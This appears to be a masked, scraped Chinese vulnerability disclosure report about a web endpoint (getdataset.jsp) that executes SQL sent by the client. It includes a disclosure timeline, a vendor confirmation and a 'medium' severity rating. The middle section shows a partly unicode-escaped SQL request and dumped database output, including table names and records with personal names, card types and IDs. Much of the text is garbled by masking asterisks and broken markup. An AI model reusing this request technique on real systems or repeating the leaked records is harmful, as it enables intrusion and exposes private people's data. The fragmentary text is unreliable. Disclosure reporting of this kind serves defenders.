2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-29: 厂商已经确认,细节仅向厂商公开 2015-12-09: 细节向核心白帽子及相关领域专家公开 2015-12-19: 细节向普通白帽子公开 2015-12-29: 细节向实习白帽子公开 2016-01-13: 细节向公众公开
设计缺陷,求帮打马赛克
1.http://**.**.**/login_czw.jsp_*****2a842dc479c2.png" alt=&quo**********^已经注册^**********feaadadba54e.png" alt=&quo**********此时系统会向^**********ode*****2.://**.**.**//**.**.**.**/public/getdataset.jsp HTTP/1.1_*****t: **********uage: ***********.**/szpt/we**********on/x-www-for**********: gzip, **********IE 9.0; Windows NT 6************.************ength********** Keep-********** no-**********R2offKyOG08Kp7********************5F$u0075$u0073$u0065$u0072 $u0077$u0068$u0065$u0072$u0065 c_mobileno='^**********de&g********************^^的而且使^**********^^以^**********ode**********0066$u0072$u006F$u006**********de&g**********^^^**********42910774d056.png" alt=&quo*****
*****^^数大^**********c7fdf05bf3bf.png" alt=&quo**********ode**********);var rs=new js**********e("z**********BLE_NAME",&q**********String",&qu**********LGY_ZRQ",&q**********OUSE_TMP",&**********NFO_BZ",&qu**********O_BZ_TMP1",&**********BZ_TMP1_BAK",**********ERSON",&quo**********BSJ_LOG",&q**********CARDNO",&q**********JNLK",&quo**********20130609",&q**********LK_0531",&q**********_20130531",&**********LK_BF",&quo**********LK_HIS",&qu**********LK_JK",&quo**********LK_JK0913",**********LK_OLD",&qu**********JWLK",&quo**********JWLK_JK",&**********XX_HF",&quo**********TDCY",&quo**********_COUNT",&q**********MP","**********FZ_ZJSL",&q**********nd********************de&g**********t;,"14036429**********c250d1b496e4.png" alt=&quo**********有姓名被编^**********ode**********uot;INSERTFLAG","SUNIT_CODE","SORG_LOGGED","SORG_LOGGED_ID","SWHO_LOGGED","DWHEN_LOGGED","SCANCEL_SIGN","DWHEN_CANCELLED","S**********de&g********************^^**********3f3d8d452aae.png" alt=&quo******************************这^**********t;,"1868**********^量^**********f59daf2232b9.png" alt=&quo**********^^看**********40d06cc8dac2.png" alt=&quo**********ode**********;2011-06-11 11:37:28.0","fazcbg",null,null,null,"2011-06-10 13:42:06.0","3509811014",null,"fazcbg",null,"1307684230859",null,"1","0","其他&q**********37:46.0","2011-06-11 01:49:55.0","古田县华侨大厦",null,null,null,"2011-06-10 13:42:34.0","3522270029",null,"gthqds",null,"1307684266625",null,"1&**********0","0036","0036","牡丹卡",null,"2008-11-21 18:25:29.0","3504020018","2008-11-23 12:35:10.0","0036",null,null,null,"4","1",null**********;8119","牡丹卡",null,"2008-11-21 18:25:31.0","3504810019","2008-11-22 14:48:28.0","8119",null,null,null,"4","1",null,"2008-11-21**********","8016",null,"牡丹卡",null,"2008-11-21 18:25:34.0","3504280016",null,"8016",null,null,null,"1","1",null,"2008-1**********;2008-11-22 15:12:58.0","陈丽华","陈丽华","牡丹卡",null,"2008-11-21 18:25:54.0","3504260018","2008-11-22 15:12:58.0",null,null,null,null,"4&q**********11-23 09:18:22.0","0327","0054","牡丹卡",null,"2008-11-21 18:25:57.0","3504030027","2008-11-23 09:18:22.0",null,null,null,null,"4",&quo**********t;2008-11-24 21:03:38.0","8019","8019","牡丹卡",null,"2008-11-21 18:26:06.0","3504280019","2008-11-24 21:03:38.0","8019",null,null,null,"4&**********07 21:12:33.0","2717","2717","牡丹卡",null,"2008-11-21 20:52:31.0","3504270017","2008-12-07 21:12:33.0","2717",null,null,null,"4","1&quo**********06-28 20:49:49.0","2909",null,"牡丹卡",null,"2008-11-21 20:52:40.0","3504290009",null,"2909",null,null,null,"1","1&q**********","0042","牡丹卡",null,"2008-11-21 20:52:47.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1",nul**********","0054","0054","牡丹卡",null,"2008-11-21 20:52:58.0","3504030027","2008-11-22 10:09:20.0","0054",null,null,null,"4","1",null,&**********54:34.0","8134","8134","牡丹卡",null,"2008-11-21 20:53:09.0","3504810034","2009-02-11 17:54:34.0",null,null,null,null,"4","1&q**********;,"0042","0042","牡丹卡",null,"2008-11-21 20:43:35.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1&q**********-24 11:17:32.0","唐加联","唐加联","牡丹卡",null,"2008-11-21 20:43:37.0","3504250012","2008-11-24 11:17:32.0",null,null,null,null,"4"**********0","2009-03-20 14:17:18.0","0202",null,"牡丹卡",null,"2008-11-21 20:43:44.0","3504020002",null,"0202",null,null,null,"1","1&quo**********"2009-03-17 00:39:10.0","0244",null,"牡丹卡",null,"2008-11-21 20:43:49.0","3504020044",null,"0244",null,null,null,"1",&q**********2:09.0","2008-11-22 10:31:30.0","2714","2714","牡丹卡",null,"2008-11-21 20:43:54.0","3504270014","2008-11-22 10:31:30.0",null,null,null,null,&quo**********quot;2011-06-11 14:05:58.0","东侨长兴足浴",null,null,null,"2011-06-10 13:42:35.0","3509990799",null,"dqcxzy",null,"1307684273234",null,"1","0",&quo**********nd********************de&g**********^^*****
不要传sql
危害等级:中
漏洞Rank:7
确认时间:2015-11-29 16:10
感谢提交!!验证确认所描述的问题,已通知其修复。
暂无